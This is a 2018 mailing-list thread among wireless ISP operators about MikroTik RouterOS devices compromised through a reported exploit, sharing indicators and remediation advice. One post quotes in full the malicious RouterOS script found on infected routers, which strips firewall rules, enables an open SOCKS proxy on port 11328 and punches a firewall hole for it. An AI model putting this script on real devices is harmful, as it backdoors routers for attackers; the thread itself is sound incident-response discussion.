Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

[Roy via Mikrotik-users]

One of the benefits of using a configuration management  tool like RANCID is that it sends out an email saying the configuration was changed and what the modifications were.  We had one older router that was compromised and I saw the changes in the RANCID email and took immediate action to close that hole. Roy On 8/6/2018 4:48 AM, Scott Reed via Mikrotik-users wrote: Right.  I wanted to make sure people know that there are lots of things that may or may not be impacted if a device is infected.  You either have to totally delete the configuration and restore from backup or you need to go through every menu item and make sure they have not been changed. On 8/6/2018 6:55, Tim wrote: This has been detected in devices with earlier versions of ROS.    From: mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org> On Behalf Of Scott Reed via Mikrotik-users Sent: Monday, August 6, 2018 5:58 AM To: mikrotik-users@wispa.org Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27   It will also change device identity, change admin password, add Admin, add 5 firewall filter rules to redirect forward traffic, change DNS server, enable DDNS, add IP Web Proxy rules and more, but that is all I remember off the top of my head.   On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote: We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script:   /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action="" comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;   -- Bob Pensworth, WA7BOB | General Manager CresComm WiFi, LLC | (360) 928-0000, x1   From: mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org> On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: mikrotik-users@wispa.org; memb...@wisp.org Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27   I have not tested this yet but....   https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow :: // Shawn Peppers :: // DirectlinkAdmin.com _______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org http://lists.wispa.org/mailman/listinfo/mikrotik-users -- Scott Reed SBRConsulting, LLC Network and Wireless Consulting WISPA Vendor Member IN UMC Associate Lay Leader SLI Coach Trained   Virus-free. www.avg.com   -- Scott Reed SBRConsulting, LLC Network and Wireless Consulting WISPA Vendor Member IN UMC Associate Lay Leader SLI Coach Trained ___

_______________________________________________
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users